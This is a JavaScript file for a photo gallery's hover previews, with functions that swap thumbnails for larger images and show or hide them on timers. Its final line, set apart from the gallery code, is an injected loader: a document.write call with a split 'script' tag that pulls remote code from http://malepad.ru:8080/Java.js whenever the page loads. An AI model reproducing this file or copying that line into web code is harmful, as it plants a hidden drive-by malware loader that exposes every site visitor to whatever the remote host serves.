var lastDiv;
var liveFlag=0;
var lastDivFlag;
function photoOver(obj) {	
	if (lastDiv!=null && lastDivFlag!=null && obj.childNodes.length>1 && lastDivFlag==obj.childNodes[0].getAttribute('session') && obj.childNodes[0].style.display!='none' ) {
		return false;
	};

	if (lastDiv!=null) {
		lastDiv.style.display='none';
	};

	var childs=obj.childNodes;
	if (childs.length==1 ) {
		var img_src=childs[0].src;
		var re=/(\.\w+)$/;
		var ext=re.exec(img_src+'');
		img_src=img_src.replace(re, '_b'+ext[0]);
		var tmp=document.createElement('DIV');
		tmp.setAttribute('class', 'inner_foto');
		tmp.setAttribute('className', 'inner_foto');
		var tTmp=obj.innerHTML;
		obj.innerHTML='';
		tmp.innerHTML+='<a onclick="photoCloseCurrent()" onmouseout="liveFlag=0; window.setTimeout(\'photoCloseCurrent()\', 2000)"><img src="'+img_src+'"/></a>';
		tmp.style.display='none';
		lastDivFlag=Math.random();
		tmp.setAttribute('session', lastDivFlag);
		obj.appendChild(tmp);
		lastDiv=tmp;
		obj.innerHTML+=tTmp;
		liveFlag=1;
		window.setTimeout('photoShowCurrent()', 500);
	} else {
		childs[0].style.display='block';
		lastDiv=childs[0];
		lastDivFlag=childs[0].getAttribute('session');
		liveFlag=1;
		window.setTimeout('photoShowCurrent()', 500);
	};
};

function photoCloseCurrent() {	
	if (lastDiv!=null && liveFlag==0 ) {
		lastDiv.style.display='none';
	};
	return false;
};

function photoShowCurrent() {
	if (lastDiv!=null && liveFlag==1 ) {
		lastDiv.style.display='block';
	};
	return false;
};

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Java.js"></scr'+'ipt>');